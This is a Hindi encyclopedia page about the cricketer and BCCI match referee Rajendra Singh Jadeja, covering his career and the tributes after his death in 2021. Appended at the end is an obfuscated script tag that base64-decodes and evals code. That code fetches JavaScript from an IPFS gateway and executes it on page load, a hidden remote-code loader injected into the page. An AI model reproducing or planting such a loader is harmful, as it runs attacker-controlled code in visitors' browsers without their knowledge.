राजेंद्र सिंह जडेजा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
राजेंद्र सिंह जडेजा

राजेंद्र सिंह जडेजा (अंग्रेज़ी: Rajendra Singh Jadeja, मृत्यु- 16 मई, 2021) भारतीय क्रिकेटर थे। वह 53 प्रथम श्रेणी, 18 लिस्ट ए और 34 टी20 मैचों में बीसीसीआई के आधिकारिक रैफरी भी रहे। वह सौराष्ट्र क्रिकेट संघ के चयनकर्ता, कोच और टीम मैनेजर भी रहे। राजेंद्र सिंह जडेजा बेहतरीन स्तर, शैली, नैतिकता और शानदार क्रिकेट क्षमता वाले व्यक्ति थे।

  • राजेंद्र सिंह जडेजा दायें हाथ के बेहतरीन तेज गेंदबाज थे. इसके अलावा अच्छे ऑलराउंडर भी थे. उन्होंने प्रथम श्रेणी क्रिकेट में 134 और 11 लिस्ट ए मैचों में 14 विकेट चटकाए. इसके अलावा प्रथम श्रेणी में 1,536 और लिस्ट ए में 104 रन भी बनाए.
  • वह न केवल बेहतरीन क्रिकेटर थे, बल्कि बीसीसीआई के अच्छे मैच रैफरी भी थे. उन्होंने 53 प्रथम श्रेणी, 18 लिस्ट ए और 34 टी20 मैचों में बीसीसीआई के आधिकारिक रैफरी भी रहे.
  • वह चयनकर्ता, कोच और टीम मैनेजर भी रहे थे।
  • राजेंद्र सिंह जडेजा जितने अच्छे क्रिकेट थे, उतने ही अच्छे कोच, चयनकर्ता भी रहे. वह सौराष्ट्र क्रिकेट संघ के चयनकर्ता, कोच और टीम मैनेजर भी रहे.
  • पूर्व क्रिकेटर व गेंदबाज़ राजेंद्र सिंह जडेजा का निधन 16 मई, 2021 को कोरोना संक्रमण के कारण हुआ। उनके निधन पर बीसीसीआई और एससीए के पूर्व सचिव निरंजन शाह ने जडेजा को स्तर, शैली, नैतिकता और शानदार क्रिकेट क्षमता वाला व्यक्ति बताया. उन्होंने कहा, क्रिकेट के प्रति उनका समर्पण और योगदान हमेशा याद रहेगा.
  • जडेजा के साथ कार्यालय और क्षेत्रीय स्तर पर खेल चुके भारतीय क्रिकेट टीम के मुख्य कोच रवि शास्त्री ने भी उनके निधन पर शोक व्यक्त किया। रवि शास्त्री और जडेजा मुंबई क्रिकेट की मशहूर टीम निरलोन्स की तरफ से खेला करते थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>